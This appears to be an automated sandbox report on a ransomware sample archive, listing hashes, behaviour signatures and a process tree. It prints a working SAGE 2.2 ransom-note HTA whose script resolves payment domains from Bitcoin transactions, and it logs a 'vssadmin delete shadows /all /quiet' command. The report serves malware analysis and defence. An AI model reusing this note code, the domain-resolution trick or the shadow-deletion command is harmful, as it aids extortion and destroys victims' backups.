Resubmissions

15-11-2024 22:50

241115-2shsxsvajq 1

13-11-2024 17:34

241113-v5l8jszkap 10

Analysis

  • max time kernel
    156s
  • max time network
    159s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 17:34

General

  • Target

    RNSM00305.7z

  • Size

    5.2MB

  • MD5

    b30d12b425ce73635749dc1e385e8861

  • SHA1

    462d6ea1ca10adf05cacee65bfd72dde8292452f

  • SHA256

    458e16f5297a3a3e3ff65d0b9607ad42d07534d70115eed6e5f463171b1370e3

  • SHA512

    e1e2fdf72c6a46756d94d426fa88b6f18c189625c43fcde92b149d8223386169ca86a963cd47655e0e0b0cd30cc324e0d9b10d399fa0090ae4d36dd366853f76

  • SSDEEP

    98304:C3MKt6mMG7ulCb0oMVPnAdkLL7PutuIWAC4HyzRzoEKlVa84jAHv:MfX/lb0Djz9Nb4SzREjl3cAHv

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; } h2 { color: #555; text-align: center; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 1em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","pt","es","fr","kr","nl","ar","fa","zh"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); // tweakClass('links', function(el){ el.innerHTML = err; }); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AYW8jUkY_mfuhQCoZ50KvjlDLzmdIFeN6AhRSnRHvyiOtzdY1Butqj_A" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2> <h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2> <h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2> <h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2> <h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2> <h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2> <h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2> <h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2> <h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2> <h2 class='l l-zh' >文件已被加密,但是可以解密</h2> <p><span id='filename'></span></p> </div> </div> <h2>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2> <h2>Action required to restore your files.</h2> </div> <div class='container'> <div class="text l l-en" style='display:block'> <h1>File recovery instructions</h2> <p>You probably noticed that you can not open your files and that some software stopped working correctly.</p> <p>This is expected. Your files content is still there, but it was encrypted by <span class='us'>"SAGE 2.2 Ransomware"</span>.</p> <p>Your files are not lost, it is possible to revert them back to normal state by decrypting.</p> <p>The only way you can do that is by getting <span class='us'>"SAGE Decrypter"</span> software and your personal decryption key.</p> <div class='info'> <p>Using any other software which claims to be able to restore your files will result in files being damaged or destroyed.</p> </div> <p>You can purchase <span class='us'>"SAGE Decrypter"</span> software and your decryption key at your personal page you can access by following links:</p> <div class='keys links'> <div class='key'> <a href="http://7gie6ffnkrjykggd.2kzm0f.com/login/AYW8jUkY_mfuhQCoZ50KvjlDLzmdIFeN6AhRSnRHvyiOtzdY1Butqj_A" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.2kzm0f.com/</a> </div> <div class='key'> <a href="http://7gie6ffnkrjykggd.l3nq0.net/login/AYW8jUkY_mfuhQCoZ50KvjlDLzmdIFeN6AhRSnRHvyiOtzdY1Butqj_A" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.l3nq0.net/</a> </div> </div> <div class='info lu lu-orig'> <p>If none of these links work for you, <a href='#' onclick='javascript:return updateLinks()'><b>click here</b></a> to update the list.</p> </div> <div class='info lu lu-updating'> <p>Updating links...</p> </div> <div class='info lu lu-error'> <p>Something went wrong while updating links, please wait some time and <a href='#' onclick='javascript:return updateLinks()'><b>try again</b></a> or use "Tor Browser" method below.</p> </div> <div class='info lu lu-done'> <p>Links updated, if new ones still don't work, please wait some time and <a href='#' onclick='javascript:return updateLinks()'><b>try again</b></a> or use "Tor Browser" method below.</p> </div> <p>If you are asked for your personal key, copy it to the form on the site. This is your personal key:</p> <div class='keys'> <div class='key'> AYW8jUkY_mfuhQCoZ50KvjlDLzmdIFeN6AhRSnRHvyiOtzdY1Butqj_A </div> </div> <p>You will also be able to decrypt one file for free to make sure "SAGE Decrypter" software is able to recover your files</p> <div class='info'> <p>If none of those links work for you for a prolonged period of time or you need your files recovered as fast as possible, you can also access your personal page using "Tor Browser".</p> <p>In order to do that you need to:</p> <ol> <li>open Internet Explorer or any other internet browser;</li> <li>copy the address <a href='https://www.torproject.org/download/download-easy.html.en' onclick='javascript:return openlink(this.href)'>https://www.torproject.org/download/download-easy.html.en</a> into address bar and press "Enter";</li> <li>once the page opens, you will be offered to download Tor Browser, download it and run the installator, follow installation instructions;</li> <li>once installa
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Signatures

  • Dharma

    Dharma is a ransomware that uses security software installation to hide malicious activities.

  • Dharma family
  • GlobeImposter

    GlobeImposter is a ransomware first seen in 2017.

  • Globeimposter family
  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Gozi family
  • Pony family
  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Contacts a large (7713) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (259) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (8705) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Clears Network RDP Connection History and Configurations 1 TTPs 4 IoCs

    Remove evidence of malicious network connections to clean up operations traces.

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 25 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 11 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 22 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 61 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • NSIS installer 2 IoCs
  • Interacts with shadow copies 3 TTPs 9 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 6 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 19 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1108
    • C:\Windows\System32\vssadmin.exe
      "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Interacts with shadow copies
      PID:2388
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1172
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Accesses Microsoft Outlook accounts
    • Accesses Microsoft Outlook profiles
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • outlook_office_path
    • outlook_win_path
    PID:1204
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00305.7z"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2272
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      2⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2904
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2240
      • C:\Users\Admin\Desktop\00305\HEUR-Trojan-Ransom.Win32.Foreign.gen-877026bab25fbb0b7f48ef930be29491aff73302d0fab551f049dbcffacf0778.exe
        HEUR-Trojan-Ransom.Win32.Foreign.gen-877026bab25fbb0b7f48ef930be29491aff73302d0fab551f049dbcffacf0778.exe
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Drops desktop.ini file(s)
        • Enumerates connected drives
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:1060
        • C:\Users\Admin\Desktop\00305\HEUR-Trojan-Ransom.Win32.Foreign.gen-877026bab25fbb0b7f48ef930be29491aff73302d0fab551f049dbcffacf0778.exe
          "C:\Users\Admin\Desktop\00305\HEUR-Trojan-Ransom.Win32.Foreign.gen-877026bab25fbb0b7f48ef930be29491aff73302d0fab551f049dbcffacf0778.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook accounts
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          PID:5004
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\259537116.bat" "C:\Users\Admin\Desktop\00305\HEUR-Trojan-Ransom.Win32.Foreign.gen-877026bab25fbb0b7f48ef930be29491aff73302d0fab551f049dbcffacf0778.exe" "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3176
      • C:\Users\Admin\Desktop\00305\HEUR-Trojan-Ransom.Win32.Generic-3a2e28abe439fb6eecf3cd7d5dda3704f0b00955e3a0f685c6905a8ad30d5f14.exe
        HEUR-Trojan-Ransom.Win32.Generic-3a2e28abe439fb6eecf3cd7d5dda3704f0b00955e3a0f685c6905a8ad30d5f14.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        PID:1508
        • C:\Users\Admin\Desktop\00305\HEUR-Trojan-Ransom.Win32.Generic-3a2e28abe439fb6eecf3cd7d5dda3704f0b00955e3a0f685c6905a8ad30d5f14.exe
          HEUR-Trojan-Ransom.Win32.Generic-3a2e28abe439fb6eecf3cd7d5dda3704f0b00955e3a0f685c6905a8ad30d5f14.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1836
          • C:\Users\Admin\AppData\Roaming\Ziyhna\wiikv.exe
            "C:\Users\Admin\AppData\Roaming\Ziyhna\wiikv.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:544
            • C:\Users\Admin\AppData\Roaming\Ziyhna\wiikv.exe
              "C:\Users\Admin\AppData\Roaming\Ziyhna\wiikv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:1292
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_e291d4ef.bat"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2428
      • C:\Users\Admin\Desktop\00305\HEUR-Trojan-Ransom.Win32.Generic-5aa256189ce393c8845b7edb791307b41f30a8d1f7024b61ccd8ee7b68a9445f.exe
        HEUR-Trojan-Ransom.Win32.Generic-5aa256189ce393c8845b7edb791307b41f30a8d1f7024b61ccd8ee7b68a9445f.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        PID:1776
        • C:\Users\Admin\Desktop\00305\HEUR-Trojan-Ransom.Win32.Generic-5aa256189ce393c8845b7edb791307b41f30a8d1f7024b61ccd8ee7b68a9445f.exe
          HEUR-Trojan-Ransom.Win32.Generic-5aa256189ce393c8845b7edb791307b41f30a8d1f7024b61ccd8ee7b68a9445f.exe
          4⤵
          • Executes dropped EXE
          PID:1156
      • C:\Users\Admin\Desktop\00305\Trojan-Ransom.MSIL.Phny.m-ad1d99b1a9adefa31d10f199f6327ce7325ef391504f0413773a0ac58fece46f.exe
        Trojan-Ransom.MSIL.Phny.m-ad1d99b1a9adefa31d10f199f6327ce7325ef391504f0413773a0ac58fece46f.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:1764
      • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Blocker.klsk-6cd68f13d54745edcdc5e0ee4101a5b5d0adc1773c547d021370c9818d366fd6.exe
        Trojan-Ransom.Win32.Blocker.klsk-6cd68f13d54745edcdc5e0ee4101a5b5d0adc1773c547d021370c9818d366fd6.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:2376
      • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Blocker.kmye-ce5bb3a98822c116832d80c75a9b639fe55b01c533a3b132ceaefb7eb632a67a.exe
        Trojan-Ransom.Win32.Blocker.kmye-ce5bb3a98822c116832d80c75a9b639fe55b01c533a3b132ceaefb7eb632a67a.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of SetWindowsHookEx
        PID:800
        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Blocker.kmye-ce5bb3a98822c116832d80c75a9b639fe55b01c533a3b132ceaefb7eb632a67a.exe
          Trojan-Ransom.Win32.Blocker.kmye-ce5bb3a98822c116832d80c75a9b639fe55b01c533a3b132ceaefb7eb632a67a.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:2872
          • C:\Users\Admin\AppData\Roaming\Z0BAZwxx\abgrcnq.exe
            C:\Users\Admin\AppData\Roaming\Z0BAZwxx\abgrcnq.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4912
      • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Blocker.kmzv-cd79ea54546cb156c0d0d6b9825fb692ece4c572bb09b5b0cd058e3bffd72bc9.exe
        Trojan-Ransom.Win32.Blocker.kmzv-cd79ea54546cb156c0d0d6b9825fb692ece4c572bb09b5b0cd058e3bffd72bc9.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:480
